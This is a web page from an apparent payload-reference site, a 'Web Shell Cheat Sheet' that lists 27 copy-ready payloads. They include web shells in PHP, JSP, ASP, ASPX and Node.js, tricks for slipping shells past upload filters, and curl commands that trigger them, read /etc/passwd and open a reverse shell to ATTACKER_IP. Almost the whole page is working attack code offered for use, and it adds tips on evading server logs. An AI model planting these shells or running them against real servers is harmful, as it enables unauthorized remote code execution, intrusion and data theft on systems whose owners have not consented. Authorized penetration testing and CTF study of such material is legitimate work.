Web Shell Cheat Sheet

Minimal web shells, system() one-liners, upload filter bypasses, and post-upload command execution for authorized penetration testing and CTF engagements. (27 payloads)

Build custom Web Shells payloads in the File Upload generator

Minimal Single-Language Web Shells

(7)

<?php system($_GET['cmd']); ?>

Classic minimal PHP web shell. Runs any command passed in the cmd parameter via system(). The output is written straight into the HTTP response.Save as shell.php on an Apache/PHP target; request /shell.php?cmd=id

<?php echo shell_exec($_REQUEST['c']); ?>

PHP shell using shell_exec(), which returns the full command output as a string. $_REQUEST accepts GET, POST or cookie input, useful when one method is filtered.PHP — shell_exec returns output; pair with echo to display

<%@ page import="java.util.*,java.io.*" %><% Process p=Runtime.getRuntime().exec(request.getParameter("cmd")); BufferedReader d=new BufferedReader(new InputStreamReader(p.getInputStream())); String l; while((l=d.readLine())!=null){out.println(l);} %>

Minimal JSP web shell. Uses Runtime.exec() to run the cmd parameter and streams stdout back line by line into the response.Tomcat/Jetty/JBoss — save as shell.jsp; request /shell.jsp?cmd=whoami

<jsp:scriptlet>Runtime.getRuntime().exec(request.getParameter("cmd"));</jsp:scriptlet>

JSPX (XML-syntax JSP) shell using the jsp:scriptlet element. Useful when the upload filter blocks .jsp but allows .jspx, which many Java app servers also execute.Save as shell.jspx; .jspx is valid XML so it can dodge naive .jsp filters

<% Response.Write(CreateObject("WScript.Shell").Exec("cmd /c " & Request.QueryString("cmd")).StdOut.ReadAll()) %>

Classic ASP (VBScript) web shell. Uses WScript.Shell to run cmd and reads StdOut back into the response. Works on legacy IIS with classic ASP enabled.IIS classic ASP — save as shell.asp; request /shell.asp?cmd=whoami

<%@ Page Language="C#" %><% System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName="cmd.exe"; p.StartInfo.Arguments="/c "+Request["cmd"]; p.StartInfo.UseShellExecute=false; p.StartInfo.RedirectStandardOutput=true; p.Start(); Response.Write("<pre>"+p.StandardOutput.ReadToEnd()+"</pre>"); %>

ASPX (C#) web shell. Spawns cmd.exe via System.Diagnostics.Process, redirects stdout, and writes the output into the page.IIS ASP.NET — save as shell.aspx; request /shell.aspx?cmd=whoami

require('http').createServer((q,r)=>require('child_process').exec(require('url').parse(q.url,true).query.cmd,(e,o)=>r.end(o))).listen(8888)

Node.js standalone command-exec listener. Starts an HTTP server that runs the cmd query parameter via child_process.exec and returns stdout. Drop into a writable .js and execute, or paste into an eval/RCE sink.Node — run with: node shell.js, then curl http://host:8888/?cmd=id

system() One-Liner Shells

(6)

<?php passthru($_GET['cmd']); ?>

PHP one-liner using passthru(), which sends raw command output (including binary) directly to the response — handy when shell_exec/system are disabled but passthru is not.Try when other exec functions are disabled in php.ini disable_functions

<?php echo `$_GET[cmd]`; ?>

PHP backtick operator shell. The backticks invoke shell_exec implicitly. Extremely short, useful for byte-limited upload fields.PHP — backticks are an alias for shell_exec()

<?=`$_GET[0]`?>

Ultra-short PHP shell using the short-echo tag and the 0 parameter. Among the smallest functional PHP shells (under 16 bytes); pairs well with tight size or character constraints.Requires short_open_tag enabled (default in modern PHP); /x.php?0=id

<?php if(isset($_GET['cmd'])){echo '<pre>';$c=$_GET['cmd'];system($c);echo '</pre>';} ?>

PHP shell wrapping output in <pre> tags for readable multi-line output in a browser, gated behind an isset check so the file stays quiet without the parameter.PHP — wraps output in <pre> for clean browser display

<?php eval($_POST['x']); ?>

PHP eval shell — executes arbitrary PHP sent in the x POST body (not just OS commands). The basis for tools like China Chopper; very stealthy due to its tiny size.POST x=system('id'); to it — flexible but executes raw PHP

<%= Runtime.getRuntime().exec(request.getParameter("c")) %>

JSP expression one-liner. Fires Runtime.exec() in a single expression tag. Note it does not return stdout (Process object only), so combine with a read-back shell for output.JSP — blind exec; use for fire-and-forget like a reverse shell

Extension & Filename Bypasses

(6)

shell.php5 / shell.phtml / shell.pht / shell.phar

Alternate PHP extensions still mapped to the PHP handler by many Apache configs. Bypasses filters that only blacklist the literal .php extension.Try when .php is blocked; .phtml and .phar are common winners

shell.pHp / shell.PHP / shell.Php5

Mixed-case extension bypass. Case-sensitive server-side blacklists (common on Linux) miss these while the handler mapping may still be case-insensitive.Effective against naive lowercase-only string comparisons

shell.php.jpg / shell.jpg.php

Double-extension trick. shell.php.jpg can execute on Apache configs with permissive AddHandler; shell.jpg.php passes filters that only check the first extension segment.Apache mod_mime can execute the .php in shell.php.jpg

shell.php%00.jpg / shell.php\x00.jpg

Null-byte injection in the filename. On legacy PHP (<5.3.4) and some C-based parsers, the bytes after %00 are truncated, leaving an executable .php while the filter sees .jpg.Legacy null-byte truncation; mostly old stacks but still seen in CTFs

shell.php..... / shell.php%20 / shell.php::$DATA

Trailing dot/space/NTFS-stream tricks. Windows strips trailing dots and spaces, and ::$DATA references the default NTFS data stream — the saved file becomes shell.php while bypassing the check.IIS/Windows targets — ::$DATA is the NTFS alternate data stream bypass

POST /upload  ...  Content-Disposition: form-data; name="file"; filename="shell.jpg"  ->  rename via path traversal: filename="../shell.php"

Path-traversal in the filename field to drop the shell outside the intended upload directory or with a controlled name. Combine with an executable extension once traversal is confirmed.Test filename values like ../shell.php or ..\\shell.php

Content-Type & Magic-Byte Bypasses

(4)

Content-Type: image/jpeg (on the multipart part for shell.php)

Spoof the part's Content-Type header to a whitelisted MIME type while keeping a code extension/body. Defeats filters that trust the client-supplied Content-Type instead of inspecting bytes.Edit the multipart sub-part header in Burp Repeater

GIF89a;\n<?php system($_GET['cmd']); ?>

Magic-byte prefix bypass. The GIF89a header makes content-sniffing and getimagesize() validators accept the file as an image; the PHP after it still executes when the file is requested.Works against getimagesize()/finfo checks expecting a real image header

\xFF\xD8\xFF\xE0 ... <?php system($_GET['cmd']); ?>

JPEG magic-byte (FFD8FFE0 JFIF) prefix followed by PHP. Same idea as the GIF trick but for JPEG-only whitelists. Prepend the real JPEG signature bytes before the PHP block.Use a hex editor or printf to prepend the FFD8FFE0 bytes

exiftool -Comment='<?php system($_GET["cmd"]); ?>' real.jpg -o shell.php.jpg

Embed PHP inside a genuine image's EXIF/comment metadata. The file is a structurally valid image (passes deep validators) yet contains executable code when interpreted by the PHP handler.Strongest image-shell bypass — survives re-validation and getimagesize()

Post-Upload Execution & Usage

(4)

curl 'http://target/uploads/shell.php?cmd=id'

Trigger a deployed GET-based PHP shell and read the output. Confirm code execution with a benign command like id or whoami before anything further.First request after upload — verify RCE with id/whoami

curl -s 'http://target/shell.php' --data 'c=cat /etc/passwd'

Drive a $_REQUEST/$_POST shell over POST. POST keeps the command out of server access logs and proxy histories, and avoids URL-length/encoding limits for longer commands.Stealthier than GET; for shell.php with $_REQUEST['c'] or $_POST['c']

curl 'http://target/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/ATTACKER_IP/4444%200%3E%261%27'

Use the web shell to spawn an interactive reverse shell back to your listener (nc -lvnp 4444). The bash -i >& /dev/tcp/... payload is URL-encoded for the cmd parameter.Start listener first: nc -lvnp 4444; upgrades web shell to a TTY

curl 'http://target/shell.jsp.jpg/.jsp?cmd=whoami' (semicolon/path trick: /shell.jsp;.jpg)

Path/semicolon execution tricks for Java servers. On some Tomcat/IIS setups, shell.jsp;.jpg or appending a path segment causes the server to execute the .jsp despite the image-looking name.Tomcat pathinfo and IIS semicolon (;) parsing quirks

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

File Upload

Related Cheat Sheets

Reverse Shell Cheat Sheet Command Injection Cheat Sheet File Upload Cheat Sheet

Frequently asked questions

What is the Web Shell Cheat Sheet?+

It's a quick-reference collection of 27 Web Shells payloads for testing Web Shell vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Web Shells payloads?+

Copy any payload straight into your authorized test, or open the File Upload generator to build customized Web Shells variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.

Are these Web Shells payloads free to use?+

Yes — this cheat sheet and all Web Shells payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Web Shell Cheat Sheet?+

How do I use these Web Shells payloads?+

Are these Web Shells payloads free to use?+

Yes — this cheat sheet and all Web Shells payloads are completely free, with no account required. Everything runs in your browser.